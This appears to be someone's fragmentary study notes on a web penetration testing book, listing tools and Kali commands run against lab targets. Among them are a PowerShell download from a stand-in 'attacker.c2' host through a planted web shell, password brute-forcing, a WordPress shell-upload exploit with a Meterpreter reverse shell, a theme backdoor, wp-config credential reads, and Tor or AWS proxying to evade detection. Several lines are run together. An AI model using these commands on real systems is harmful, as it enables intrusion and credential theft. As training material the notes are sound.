Resources
• Penetration Testers Framework (PTF): https://github.com/trustedsec/
ptf
• BlackArch: https://blackarch.org
• Burp Suite: https://portswigger.net/burp/
• OWASP ZAP: https://www.owasp.org/index.php/OWASP_Zed_Attack_
Proxy_Project
Amazon Web Services: https://aws.amazon.com
• Microsoft Azure: https://portal.azure.com
• Google Cloud Platform: https://cloud.google.com
• DigitalOcean: https://www.digitalocean.com
• Linode: https://www.linode.com
Exercises
Complete the following exercises to get better acquainted with the hacker toolset
and the tools we’ll be using throughout this book:
1. Download and install your preferred penetration testing distribution:
Kali or BlackArch, or play around with PTF
2. Use Burp Suite Free or ZAP to intercept, inspect, and modify traffic
to your favorite site
3. Create a free account on the cloud computing provider of your choice
and use its free tier to launch a Linux virtual machine instance
1.NMAP Scan using MSF
2.MASSCAN — It’s faster than NMAP scanning
3.Whatweb — identity what technologies have been used to develop and run it.
https://github.com/urbanadventurer/WhatWeb.
4.Nikto — Nikto can guess subdomains,report on unusual headers, and check the robots.txt file for interesting information:
https://github.com/sullo/nikto
5. CMS scanners — When the target is using a CMS, such as Joomla, Drupal, or WordPress,running an automated vulnerability testing tool should be your next step
• WPScan (https://wpscan.org/): A powerful tool aimed at testing WordPress installations
• JoomScan (https://github.com/rezasp/joomscan): As the name implies, a CMS scanner specializing in Joomla testing
• droopescan (https://github.com/droope/droopescan): A Drupal-specific scanner with some support for Joomla
• CMSmap (https://github.com/Dionach/CMSmap): A more generic scanner and brute-forcer supporting WordPress, Joomla, and Drupal
6.Efficient brute-forcingBrute-forcing a web service, for example, with the infamous rockyou.txt
One of the better collections of common keywords, credentials, directories payloads, and even webshells is the SecLists repository:
https://github.com/danielmiessler/SecLists.
https://github.com/fuzzdb-project/fuzzdb
root@kali:~/tools# git clone https://github.com/danielmiessler/SecLists
SecList Wordlist Description
Discovery — Web content, DNS, and common Nmap ports
Fuzzing — FuzzDB, Brutelogic, Polyglot payloads, and more
IOCs- Malware-related indicators of compromise
Miscellaneous — Various wordlists that may have obscure uses
Passwords — Large numbers of wordlists for common passwords,split into top-N files
Pattern-Matching — Wordlists for use when “grepping” for interesting information
Payloads — Webshells for common languages, Windows Netcat,and an EICAR test file
Usernames — Lists of common names and login IDs
Useful information can include the following:
• The webserver software: Apache, NGINX, or IIS
• Server-side development language: ASP.NET, PHP, or Java
• Underlying operating system: Linux, Windows, or embedded
• robots.txt
• Interesting response headers
• WAF detection: F5 or Akamai
The robots.txt file is generally interesting, as it can provide “hidden” directories
or files, and can be a good starting point when brute-forcing for directories or files.
The robots.txt file essentially provides instructions for legitimate crawler bots on
what they’re allowed to index and what they should ignore.
A sample robots.txt file will look something like this:
User-agent: *
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /~admin/
7. Content discovery — tools — OWASP ZAP & Burp Suite 0r alternative automated — Gobuster
Burp Suite- Intruder module — easily perform content discovery -look for hidden directories and files, and even guess credentials
It supports payload processing and encoding, which enables us to customize our scanning to better interface with the target application.
Intruder module = same wordlists provided by SecLists
features
.Cluster bomb attack, which is well suited for multiple payloads,such as usernames and passwords, which we will showcase later
• Payload processing for highly customized attacks
• Attack throttling and variable delays for low and slow attacks
OWASP ZAP — Fuzzer module
Gobuster- https://github.com/OJ/gobuster
root@kali:~# apt-get install golang
root@kali:~# export GOPATH=~/go
root@kali:~# export GOBIN=$GOPATH
root@kali:~/tools# git clone https://github.com/OJ/gobuster
root@kali:~/tools/gobuster# go get && go buildroot@kali:~/tools/gobuster# ./gobuster
Persistent content discovery (http://10.0.5.181/ — Application Hosted)
ZAP> Fuzz Location>select the raft-small-files.txt wordlist from the SecLists repository
Payload processing
Intruder will let us attack the basic authentication mechanism with little effort:
Payload:1 SecLists Usernames collection called top-usernames-shortlist.txt.
Payload:2 500-worst-passwords.txt
Payloads> Payload Processing>Add>Base64-encode
Start Attack
Polyglot payloads
OWASP cross-site scripting (XSS) — https://owasp.org/www-community/xss-filter-evasion-cheatsheet
https://github.com/0xSobky
https://regex101.com/
Same payload, different context
A regex is a piece of text defining a search pattern. Some WAFs may use regex to try and find potentially dangerous strings inside HTTP requests.
Same payload, different context<! — Comment! [payload] →.
Code obfuscation
Resources
Consult the following resources for more information on penetration testing tools
and techniques:
• Metasploit: https://www.metasploit.com/
• WPScan: https://wpscan.org/
• CMSmap: https://github.com/Dionach/CMSmap
• Recon-NG (available in Kali Linux or via the Bitbucket repository):https://bitbucket.org/LaNMaSteR53/recon-ng
• OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
• Elsobky’s GitHub page: https://github.com/0xSobky
• Brutelogic cheat sheet: https://brutelogic.com.br/blog/cheat-sheet/
• SecLists repository: https://github.com/danielmiessler/SecLists
• FuzzDB: https://github.com/fuzzdb-project/fuzzdb
\========================================
Chapter- 3 Low-Hanging Fruit
Network assessmentroot@kali:~# msfconsole
As with all engagements involving Metasploit, we start by creating a workspace specifically for the scope:
msf > workspace -a ecorp
For this scenario, our target is a black-box API application provided by E Corp.The target host will be api.ecorp.local.
Nmap is our network recon tool of choice and coupled with Metasploit’s workspace, it becomes even more powerful. The Metasploit console wrapper command for Nmap is the db_nmap command. The Nmap switches that we will use for discovering open ports, and querying services for more information, are detailed in the following text.
-sV will instruct Nmap to perform a version scan of any identified service
-A will provide us with some host fingerprinting, attempting to detect the operating system.
-T4 option is used to tell Nmap to be more aggressive when scanning the network
-Pn switch will prevent Nmap from performing a ping of the target
-p1- scan all possible ports -p1–65535
msf > db_nmap -sV -A -T4 -Pn -p1- api.ecorp.local
msf > services
MariaDB service which is the communitydeveloped fork for the MySQL software
a list of public Common Vulnerabilities and Exposures (CVEs)
msf > use auxiliary/scanner/mysql/mysql_version
We can view more information on the mysql_version module by issuing the show info command
msf auxiliary(mysql_version) > services -s mysql -R
RHOSTS => 10.0.5.198msf auxiliary(mysql_version) >
setg RHOSTS 10.0.5.198
RHOSTS => 10.0.5.198
msf auxiliary(mysql_version) > run
msf auxiliary(mysql_version) > services -s mysql
Back in the Kali Linux terminal, we can use the mysql client command to attempt to authenticate as root (-u) to the api.ecorp.local host (-h):root@kali:~# mysql -uroot -hapi.ecorp.local
Credential guessing
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
msf auxiliary(mysql_login) > set THREADS 10msf auxiliary(mysql_login) > set VERBOSE falsemsf auxiliary(mysql_login) > set STOP_ON_SUCCESS truemsf auxiliary(mysql_login) >
set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > set PASS_FILE ~/tools/SecLists/Passwords/Common-Credentials/10-million-password-listtop-500.txt
PASS_FILE => ~/tools/SecLists/Passwords/Common-Credentials/10-millionpassword-list-top-10000.txt
msf auxiliary(mysql_login) >msf auxiliary(mysql_login) > run
A better way to shell
https://tools.kali.org/maintaining-access/weevely
https://null-byte.wonderhowto.com/how-to/slip-backdoor-into-php-websites-with-weevely-0175211/
https://www.youtube.com/watch?v=Ig-HS6kxz4Q
Weevely is a weaponized web shell installed on Kali Linux by default. It is very easy to use. It generates an obfuscated, password-protected PHP shell that can replace our earlier system() shell example. Weevely features some useful functionality that goes above and beyond the traditional system pass-through shell, including the following:
• A familiar terminal interface
• Network pivots
• File upload and download
• Reverse and direct TCP shell
• Meterpreter support
root@kali:/var/www/html# weevely generate
root@kali:/var/www/html# weevely generate ECorpAppTest11251 /var/www/html/shell.php
root@kali:/var/www/html# python -m SimpleHTTPServer 80
-m switch to load the SimpleHTTPServer module
root@kali:/var/www/html# curl -G
http://api.ecorp.local/xampp/xampp.php — data-urlencode
“password=ECorpAppTest11251& cmd=powershell -w hidden -noni -nop -c(new-object net.webclient).DownloadFile(
‘http://attacker.c2/test.php','c:\xampp\htdocs\xampp\test.php')"
Resources
Consult the following resources for more information on penetration testing tools and techniques:
• Mitre provides a handy website with all the CVEs available: http://cve.mitre.org/
• Weevely documentation and bleeding edge-code is available on GitHub:https://github.com/epinna/weevely3
\========================================
Chapter-4 Advanced Brute-forcing
• Password spraying attacks
• Metadata harvesting and public site scraping
• Using Tor to evade intrusion detection systems (IDS)
• Using Amazon Web Services (AWS) to evade IDS
Password sprayingA common issue that comes up with brute-forcing for account credentials is that the backend authentication system may simply lockout the target account after too many invalid attempts are made in a short period of time. Microsoft’s Active
Directory (AD)
Outlook Web Access (OWA), Lightweight Directory Access Protocol (LDAP)
LinkedIn scrapingsite:linkedin.com inurl:”/pub/” -inurl:”/dir/” “at [TargetCompany]”
save all account details in txt file
root@kali:~/tools# python name2account.py > target_accounts.txt
Metadata
https://github.com/ElevenPaths/FOCA
https://www.elevenpaths.com/labstools/foca/index.html
https://www.youtube.com/watch?v=Ou4TRvzYpVk
The cluster bomb
Intruder module>Positions>Cluster bomb
Behind seven proxies
IDS, intrusion prevention systems (IPS), and security information and event management (SIEM)
Torify -https://www.torproject.org/
root@kali:~# apt-get install tor torsocks
Torsocks can be found on the Tor Project Git repository https://gitweb.torproject.org/torsocks.git
root@kali:~# tor
ProxyChains is available on all penetration testing distros and on
http://proxychains.sourceforge.net/.
Configuring the upstream SOCKS proxy in Burp
Burp Suite>Project options > Override user options
check to enable the SOCKS configuration fields. The values for SOCKS proxy and
port will be localhost and 9050 respectively, and it’s a good idea to make DNS
lookups through the proxy as well.
Repeater module, to ipinfo.io
root@kali:~# torsocks — shell
/usr/bin/torsocks: New torified shell coming right up…
root@kali:~# curl ipinfo.io
root@kali:~# killall -HUP tor
root@kali:~# curl ipinfo.io
root@kali:~# killall -HUP tor
root@kali:~# curl ipinfo.ioroot@kali:~# killall -HUP
root@kali:~# curl ipinfo.ioroot@kali:~# killall -HUP torroot@kali:~# curl ipinfo.io
root@kali:~# watch -n10 killall -HUP tor
-n option specifies how often to execute the killall command.
As expected, the c2.spider.ml application server log shows the attack coming
in every 10 seconds from a new exit node IP.
root@spider-c2–1:/var/www# php -S 0.0.0.0:80
A list of active Tor exit nodes can be found here: https://check.torproject.org/cgi-bin/TorBulkExitList.py.
Proxy cannon — alternative to using Tor
https://github.com/Shellntel/scripts/blob/master/proxyCannon.py
There are countless Infrastructure as a Service (IaaS) providers, each with a large IP
space available for free to VM instances. VMs are cheap and sometimes free as well,
so routing our traffic through them should be fairly cost effective.
By default, ProxyCannon creates t2.nano virtual instances in AWS, which should
be free for a limited time with new accounts. They have very little resources but are
typically enough for most attacks. To change the type of instance, we can supply the
-t switch. The default region is us-east-1 and can be adjusted using the — region
switch.
root@kali:~/tools# pip install -U botoroot@kali:~/tools# python proxyCannon.py -h
We can start ProxyCannon using the -r and -l switches, and specify that we want 3 instances running at the same time.root@kali:~/tools# python proxyCannon.py -r -l 3What is the AWS Access Key Id: d2hhdCBhcmUgeW91IGRvaW5nWhat is the AWS Secret Access Key: dW5mb3J0dW5hdGVseSB0aGlzIGlzIG5vdCB0aGUgcmVhbCBrZXku
root@kali:~/tools# cat ~/.boto
root@kali:~# watch -n30 curl http://c2.spider.ml==============================
Chapter — 5 — File Inclusion Attacks
In this chapter, we will cover the following topics:
• RFI Remote File Inclusion
• LFI Local File Inclusion
• File upload abuse
• Chaining vulnerabilities to achieve code execution
DVWA can be downloaded in various formats, including an easy to run live CD, from http://www.dvwa.co.uk/.To keep things simple, our instance of DVWA will be accessible via http://dvwa.app.internal.
RFI
https://www.youtube.com/watch?v=EjauGmb_wDU
https://www.youtube.com/watch?v=5jeZtYay_xM
https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
LFIhttps://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601
https://www.youtube.com/watch?v=s3XQ1n5kdeQ
\========================================
Chapter -6 — Out-of-Band Exploitation
In this chapter, we will look at the following:
• Creating a C2 server
• Using INetSim to emulate services
• Confirming vulnerabilities using out-of-band techniques
• Advanced data exfiltration
A common scenario
https://www.notsosecure.com/oob-exploitation-cheatsheet/
https://www.inetsim.org/index.html
\========================================
Chapter — 7 — Automated Testing
This chapter will expose you to valuable tools and by the end, you should be able to:
• Extend the attack proxy to automate tedious tasks
• Configure Burp to use the public Collaborator instance
• Deploy our own Collaborator instance
Extending Burp
BApp Store > Options
Jython is available on http://www.jython.org/downloads.html as a standalone JAR file.
JRuby is available on http://jruby.org/download as a complete JAR file.
Additional Scanner Checks extension> Refresh > Install
Authentication and authorization abuse
One of the most tedious application security tests is an authentication or authorization
check. The basic steps to verify for this type of vulnerability go something like this:
1. Authenticate with a known-good account
2. Capture the session ID
3. Crawl the application with this session ID
4. Open a new application session
5. Authenticate with a separate known-good account
6. Capture the session ID
7. Replay the crawl with the new session ID:
° Check for vertical or horizontal escalation
8. Replay the crawl anonymously, without a session ID:
° Check for authentication bypass issues
BApp Store > Autorize
The Autorize flow
https://appsec-labs.com/autorize/
https://github.com/Quitten/Autorize
https://www.youtube.com/watch?v=3K1-a7dnA60&t=357s
A new request is made through the attack proxy:
1. Replace the Cookie header with the other session ID
2. Replay the request:
° Does the response match the original request’s? Alert [Bypassed!]
3. Remove the Cookie header
4. Replay the request:
° Does the response match the original request’s? Alert [Bypassed!]
The Swiss Army knife
The CO2 plugin can be downloaded from the BApp Store or from GitHub at https://github.com/portswigger/co2.
sqlmap helper
https://github.com/sqlmapproject/sqlmap
https://www.sqlinjection.net/sqlmap/tutorial/
https://tools.kali.org/vulnerability-analysis/sqlmap
https://websec.ca/kb/sql_injection
https://hackertarget.com/sqlmap-tutorial/
root@kali:~/tools# git clone https://github.com/sqlmapproject/sqlmap
root@kali:~/tools/sqlmap# ls -lah sqlmap.py
root@kali:~/tools/sqlmap#
sqlmap will save the session of each attack in a folder under the home directory: ~/.sqlmap/output/[target]
Web shells
https://medium.com/@alpinoacademy/threat-hunting-detecting-web-shells-d9e1e8c6de2a
Obfuscating code
root@kali:~/tools# git clone https://github.com/naneau/php- obfuscator phpobfs
root@kali:~/tools/# apt-get install composer
root@kali:~/tools/phpobfs# composer install
root@kali:~/tools/phpobfs# bin/obfuscate obfuscate ~/tools/shells/ads.php ~/tools/shells/out/
root@kali:~/tools/shells# ls -lah ads.php out/ads.php
Burp Collaborator
https://portswigger.net/burp/documentation/collaborator
Burp Collaborator client
https://portswigger.net/burp/documentation/desktop/tools/collaborator-client
https://www.youtube.com/watch?v=sGe7rHg80-k
Private Collaborator server
https://portswigger.net/burp/documentation/collaborator/deploying
https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70
\========================================
Chapter-8 -Bad Serialization
https://github.com/NickstaDB/DeserLab
\===============================
Chapter -9 — Practical Client-Side Attacks
Cross-Site Request Forgery (CSRF) attacks
same-origin policy (SOP)
By the end of the chapter, you should be comfortable with:• Stored, reflected, and DOM-based XSS• CSRF and possible attacks and limitations• BeEF, the de facto tool for client-side exploitation in the browser
The SOP will permit the following types of cross-origin objects to be embedded into the origin from any other site:• Images• Stylesheets• Scripts (which the browser will gladly execute!)• Inline frames (iframe)
CDNJS is an open-source web CDN providing almost every conceivable JavaScript library. More information on this great service can be found at https://cdnjs.com/.
Cross-origin resource sharing
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
XSS
Reflected XSS
https://github.com/mpirnat/lets-be-bad-guys
Persistent XSS
DOM-based XSS
CSRF
BeEF
root@spider-c2:~# git clone https://github.com/beefproject/beef
root@spider-c2:~/beef# ./install
\========================================
Chapter — 10 Practical Server-Side Attacks
The goal of this chapter is to get you comfortable with XML attacks and, by the end, you will be familiar with:• DoS conditions• Server-Side Request Forgery (SSRF) attacks• Information leaks• Blind exploitation and out-of-band exfiltration of data• Remote code execution
Internal and external references
XXE attacks
Request forgery
Information leak — https://github.com/mpirnat/lets-be-bad-guys
CyberChef is a great tool for data manipulation, available online or for download from GCHQ at https://gchq.github.io/CyberChef/.
Blind XXE
Remote code execution
Interactive shells
\========================================
Chapter — 11 — Attacking APIs
Application programming interfaces (APIs)
Windows API (WinAPI),
By the end of the chapter, you will be comfortable with:• The different types of web API architecture• How APIs handle authentication• JSON Web Tokens (JWTs)• Automating API attacks
API communication protocols
• Representational State Transfer (REST)• Simple Object Access Protocol (SOAP)
SOAP
SOAP was developed by Microsoft because Distributed Component Object Model(DCOM) is a binary protocol, which makes communication over the internet a bit more complicated. SOAP leverages XML instead, a more structured and human-readable language, to exchange messages between the client and the server
REST
RESTful APIs operate over HTTP and they make heavy use of the protocol verbs, including but not limited to:• GET• POST• PUT• DELETE
API authentication
Basic authentication — man-in-the-middle (MITM) attacks
API keys
Bearer authentication
JWTs — https://oauth.net/2/
Burp JWT support
https://github.com/ozzi-/JWT4B
Postman
https://www.postman.com/
https://github.com/mattvaldes/vulnerable-api
Installation — root@kali:~/tools# apt-get install libgconf-2–4
root@kali:~/tools# wget https://dl.pstmn.io/download/latest/linux64 -O postman.tar.gz
root@kali:~/tools# tar zxvf postman.tar.gz
root@kali:~/tools# ~/tools/Postman/Postman
Upstream proxy
Burp or OWASP ZAP
\========================================
Chapter -12 Attacking CMS
In the coming pages, we will look at WordPress attacks in depth and by the end, you should be comfortable with the following:• Testing WordPress with various tools• Setting up persistence within the WordPress code once you get access• Backdooring WordPress to harvest credentials and other interesting data
Application assessment
WPScan
root@kali:~# wpscan — url http://cookingwithfire.local/ — proxy 127.0.0.1:8080
Using an upstream proxy with WPScan can generate a ton of data in Burp’s proxy history, especially when performing a credential attack or active scan.
The default user agent (WPScan vX.X.X) can be changed with the — user-agent switch or randomized with — random-agent.
WPScan is available on Kali and most penetration testing distributions. It can also be found on https://wpscan.org/ or cloned from GitHub: https://github.com/wpscanteam/wpscan.
root@kali:~# wpscan — url http://cookingwithfire.local/
To specify the type of scan we want to conduct, the — enumerate (-e for short) switch accepts several parameters for active detection:• u — Look for usernames with IDs from 1 to 10• u[10–20] — Look for usernames with IDs from 10 to 20: — enumerate u[15]• p — Look for popular plugins• vp — Show me only vulnerable plugins• ap — Look for all known plugins• tt — Search for timthumbs• t — Enumerate popular themes• vt — Show me only vulnerable themes• at — Look for all known themesYou can also provide multiple — enumerate (or -e) switches to enumerate themes, plugins, and usernames all in one shot. For example, this combination of switches will perform a fairly thorough scan
root@kali:~# wpscan — url [url] -e ap -e at -e u
searchsploit results for Google Document Embedder
sqlmap
https://github.com/wp-plugins/google-document-embedder/tags?after=2.5.1
Droopescan
root@kali:~/tools# git clone https://github.com/droope/droopescan
root@kali:~/tools# cd droopescan/
root@kali:~/tools/droopescan# ls
root@kali:~/tools/droopescan# pip install -r requirements.txt
root@kali:~/tools/droopescan#
root@kali:~/tools/droopescan# python setup.py install
root@kali:~# droopescan scan drupal -u http://ramblings.local -t 8
Arachni web scanner
https://www.arachni-scanner.com/
root@kali:~/tools/arachni/bin# ./arachni_web_create_user
root@kali:~/tools/arachni/bin# ./arachni_web
Arachni comes with three scanning profiles by default:• Default• Cross-Site Scripting (XSS)• SQL injection
Persistence
root@kali:~# wpscan — url http://cookingwithfire.local/ — enumerate u
root@kali:~# wpscan — url http://cookingwithfire.local/ — usernames mary — passwords ~/tools/SecLists/Passwords/Leaked- Databases/rockyou-10.txt
For this attack, we will use SecLists’ rockyou-10.txt wordlist and we’ll target mary. As before, we can invoke wpscan with the — url parameter, then we will specify a username and point the passwords parameter to the rockyou-10.txt file from SecLists.
root@kali:~# msfconsole -q
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > options
msf exploit(unix/webapp/wp_admin_shell_upload) > run
meterpreter > sysinfo
meterpreter > getuid
msf > use payload/php/meterpreter/reverse_tcp
msf payload(php/meterpreter/reverse_tcp) > options
msf payload(php/meterpreter/reverse_tcp) > generate -h
msf payload(php/meterpreter/reverse_tcp) > generate -t raw
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(multi/handler) > options
msf exploit(multi/handler) > set ExitOnSession false
We can now run the handler with the -j option, which will send it to the background, ready for incoming connections from our victim:
msf exploit(multi/handler) > run -j
root@kali:~# curl http://cookingwithfire.local/wp- content/themes/twentyseventeen/404.php
Credential exfiltration
meterpreter > cat /var/www/html/wp-config.php